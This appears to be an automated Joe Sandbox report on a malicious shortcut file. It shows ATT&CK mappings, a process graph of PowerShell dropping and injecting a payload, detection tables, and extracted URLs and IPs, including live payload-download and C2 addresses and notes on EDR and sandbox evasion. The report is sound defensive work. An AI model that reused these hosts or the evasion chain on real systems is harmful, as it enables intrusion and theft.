                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      File and Directory Discovery
                      Remote Desktop Protocol21
                      Input Capture
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts12
                      Command and Scripting Interpreter
                      11
                      Registry Run Keys / Startup Folder
                      211
                      Process Injection
                      1
                      Abuse Elevation Control Mechanism
                      Security Account Manager145
                      System Information Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      11
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell
                      Login Hook11
                      Registry Run Keys / Startup Folder
                      3
                      Obfuscated Files or Information
                      NTDS331
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets11
                      Process Discovery
                      SSHKeylogging124
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading
                      Cached Domain Credentials41
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568258 Sample: Readme.lnk.download.lnk Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 94 Suricata IDS alerts for network traffic 2->94 96 Found malware configuration 2->96 98 Antivirus detection for URL or domain 2->98 100 13 other signatures 2->100 13 cmd.exe 1 2->13         started        16 msedge.exe 116 509 2->16         started        19 svchost.exe 1 2 2->19         started        21 2 other processes 2->21 process3 dnsIp4 120 Windows shortcut file (LNK) starts blacklisted processes 13->120 122 Suspicious powershell command line found 13->122 124 PowerShell case anomaly found 13->124 23 powershell.exe 14 19 13->23         started        28 conhost.exe 1 13->28         started        78 192.168.2.4, 18956, 18960, 443 unknown unknown 16->78 80 239.255.255.250 unknown Reserved 16->80 126 Creates multiple autostart registry keys 16->126 128 Maps a DLL or memory area into another process 16->128 30 msedge.exe 16->30         started        32 msedge.exe 16->32         started        34 msedge.exe 16->34         started        40 4 other processes 16->40 82 127.0.0.1 unknown unknown 19->82 36 msedge.exe 21->36         started        38 msedge.exe 21->38         started        signatures5 process6 dnsIp7 84 95.169.201.100, 18956, 18960, 49730 GOBULNETBG Bulgaria 23->84 74 C:\Users\user\AppData\Local\Temp\loader.bat, DOS 23->74 dropped 110 Windows shortcut file (LNK) starts blacklisted processes 23->110 112 Powershell drops PE file 23->112 42 cmd.exe 1 23->42         started        86 13.107.246.38 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->86 88 s-part-0035.t-0009.t-msedge.net 13.107.246.63 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->88 90 10 other IPs or domains 30->90 file8 signatures9 process10 signatures11 116 Windows shortcut file (LNK) starts blacklisted processes 42->116 118 Suspicious powershell command line found 42->118 45 powershell.exe 31 42->45         started        49 conhost.exe 42->49         started        process12 file13 76 C:\Users\user\...\123123213123123321132.exe, PE32 45->76 dropped 130 Loading BitLocker PowerShell Module 45->130 51 123123213123123321132.exe 45->51         started        55 msedge.exe 16 45->55         started        signatures14 process15 file16 72 C:\Users\user\Videos\...\DiskTuner.exe, PE32 51->72 dropped 102 Multi AV Scanner detection for dropped file 51->102 104 Creates multiple autostart registry keys 51->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 51->106 108 3 other signatures 51->108 57 123123213123123321132.exe 51->57         started        60 msedge.exe 55->60         started        signatures17 process18 signatures19 114 Found direct / indirect Syscall (likely to bypass EDR) 57->114 62 fontdrvhost.exe 57->62         started        66 WerFault.exe 57->66         started        process20 dnsIp21 92 104.37.175.232 MAJESTIC-HOSTING-01US United States 62->92 132 Switches to a custom stack to bypass stack traces 62->132 68 fontdrvhost.exe 62->68         started        signatures22 process23 process24 70 WerFault.exe 68->70         started       

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Readme.lnk.download.lnk21%ReversingLabsWin32.Trojan.Boxter
                      Readme.lnk.download.lnk100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\123123213123123321132.exe21%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch0%Avira URL Cloudsafe
                      http://95.169.201.100:18960/uploads/team-1/loader.txt100%Avira URL Cloudmalware
                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)pOweRsHeLL0%Avira URL Cloudsafe
                      http://95.169.201.100:189600%Avira URL Cloudsafe
                      http://95.169.201.100:189560%Avira URL Cloudsafe
                      http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp0%Avira URL Cloudsafe
                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)p0%Avira URL Cloudsafe
                      http://95.169.201.100:189602b0%Avira URL Cloudsafe
                      http://95.169.201.100:18960/uploads/team-1/readme.pdf100%Avira URL Cloudmalware
                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc030%Avira URL Cloudsafe
                      http://wwMSFT_NetOffloadGlobalSetting.cdxmll0l0%Avira URL Cloudsafe
                      http://95.169.201.100:18960/uploads/team-1/readme.exe100%Avira URL Cloudmalware
                      http://95.10%Avira URL Cloudsafe
                      http://95.169.200%Avira URL Cloudsafe
                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03).WSH;.MSCPROCc0%Avira URL Cloudsafe
                      http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec0%Avira URL Cloudsafe
                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Winsta00%Avira URL Cloudsafe
                      https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihuskernelbasentdllkernel32GetProcessMitig0%Avira URL Cloudsafe
                      https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus0%Avira URL Cloudsafe
                      https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihusx0%Avira URL Cloudsafe
                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        high
                        chrome.cloudflare-dns.com
                        172.64.41.3
                        truefalse
                          high
                          s-part-0035.t-0009.t-msedge.net
                          13.107.246.63
                          truefalse
                            high
                            b-0005.b-dc-msedge.net
                            13.107.9.158
                            truefalse
                              high
                              googlehosted.l.googleusercontent.com
                              172.217.21.33
                              truefalse
                                high
                                clients2.googleusercontent.com
                                unknown
                                unknownfalse
                                  high
                                  bzib.nelreports.net
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                      high
                                      http://95.169.201.100:18960/uploads/team-1/loader.txttrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://95.169.201.100:18960/uploads/team-1/readme.pdftrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://chrome.cloudflare-dns.com/dns-queryfalse
                                        high
                                        https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihustrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.macromedia.com123123213123123321132.exe, 123123213123123321132.exe, 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpfalse
                                            high
                                            http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://permanently-removed.invalid/o/oauth2/revokemsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.1803361498.0000016AA58A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1803361498.0000016AA5907000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1803361498.0000016AA58E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://95.169.201.100:18960powershell.exe, 00000002.00000002.1732302738.0000023181616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://go.microspowershell.exe, 00000005.00000002.1908641173.0000021104167000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)pOweRsHeLLpowershell.exe, 00000002.00000002.1762775028.00000231F8A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000007.00000003.1803361498.0000016AA5872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://msn.com/msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://95.169.201.100:18956powershell.exe, 00000002.00000002.1732302738.0000023180C31000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://95.169.201.100:189602bpowershell.exe, 00000002.00000002.1732302738.0000023181616000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://contoso.com/powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1732302738.00000231819D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.0000023190073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.00000231901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)ppowershell.exe, 00000002.00000002.1732302738.0000023180001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://95.1powershell.exe, 00000005.00000002.1908641173.000002110415F000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://wwMSFT_NetOffloadGlobalSetting.cdxmll0lpowershell.exe, 00000005.00000002.2051453477.000002111BCE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://office.net/msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1732302738.0000023180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211037A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1732302738.00000231819D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.0000023190073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1758275532.00000231901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021104B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.000002110484E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.000002110568C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021105444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2045540014.000002111B8E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211056B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://95.169.201.100:18960/uploads/team-1/readme.exepowershell.exe, 00000005.00000002.1897367350.0000021101891000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://chrome.google.com/webstoremsedge.exe, 00000006.00000002.1896022575.0000572000194000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://go.micropowershell.exe, 00000002.00000002.1732302738.0000023180C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021104B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.0000021104167000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.2029156339.0000021113813000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000005.00000002.1908641173.0000021104B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.000002110568C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211056B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cloudflare-dns.com/dns-queryfontdrvhost.exe, 0000001B.00000003.2162579775.0000000003A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.ver)svchost.exe, 00000007.00000002.2905592428.0000016AA02CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachifontdrvhost.exe, 0000001B.00000003.2162579775.0000000003A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://permanently-removed.invalid/MergeSessionmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://permanently-removed.invalid/OAuthLoginmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://95.169.20powershell.exe, 00000005.00000002.2045540014.000002111B8E0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1908641173.00000211039C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://google.com/msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://permanently-removed.invalid/AddSessionmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Winsta0powershell.exe, 00000002.00000002.1762775028.00000231F8A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihuskernelbasentdllkernel32GetProcessMitigfontdrvhost.exe, 0000001B.00000002.2233502749.0000000005954000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2230274989.0000000005955000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001F.00000002.2515294505.00000289EBE80000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://msn.cn/msedge.exe, 00000006.00000002.1897165408.00005720002E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03).WSH;.MSCPROCcpowershell.exe, 00000002.00000002.1768442721.00000231F8B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000007.00000003.1803361498.0000016AA58C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://permanently-removed.invalid/Logoutmsedge.exe, 00000006.00000003.1804154523.0000572000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1804041119.0000572000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1908641173.0000021103B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://chromewebstore.google.com/msedge.exe, 00000006.00000002.1896022575.0000572000194000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihusxfontdrvhost.exe, 0000001B.00000002.2230889696.0000000002FFC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://clients2.googleusercontent.com7eed1d6f-da3d-4fd0-8dd1-50c6bc664727.tmp.10.drfalse
                                                                                                                                  high
                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.1732302738.0000023180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908641173.00000211037A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)powershell.exe, 00000002.00000002.1769233310.00000231FA440000.00000004.00000020.00020000.00000000.sdmp, Readme.lnk.download.lnktrue
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.macromedia.com/bin/flashdownload.cgi123123213123123321132.exe, 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155411238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 00000013.00000000.1893797179.000000000053D000.00000002.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.macromedia.com/support/flashplayer/sys/123123213123123321132.exe, 123123213123123321132.exe, 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                        high
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        13.107.246.63
                                                                                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                        95.169.201.100
                                                                                                                                        unknownBulgaria
                                                                                                                                        41017GOBULNETBGtrue
                                                                                                                                        152.195.19.97
                                                                                                                                        unknownUnited States
                                                                                                                                        15133EDGECASTUSfalse
                                                                                                                                        104.37.175.232
                                                                                                                                        unknownUnited States
                                                                                                                                        396073MAJESTIC-HOSTING-01UStrue
                                                                                                                                        142.251.40.138
                                                                                                                                        unknownUnited States
                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                        162.159.61.3
                                                                                                                                        unknownUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        239.255.255.250
                                                                                                                                        unknownReserved
                                                                                                                                        unknownunknownfalse
                                                                                                                                        23.43.85.29
                                                                                                                                        unknownUnited States
                                                                                                                                        3257GTT-BACKBONEGTTDEfalse
                                                                                                                                        172.217.21.33
                                                                                                                                        googlehosted.l.googleusercontent.comUnited States
                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                        13.107.246.38
                                                                                                                                        unknownUnited States
                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                        172.64.41.3
                                                                                                                                        chrome.cloudflare-dns.comUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        13.107.9.158
                                                                                                                                        b-0005.b-dc-msedge.netUnited States
                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                        IP
                                                                                                                                        192.168.2.4
                                                                                                                                        127.0.0.1
                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1568258
                                                                                                                                        Start date and time:2024-12-04 13:57:07 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 10m 2s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:36
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
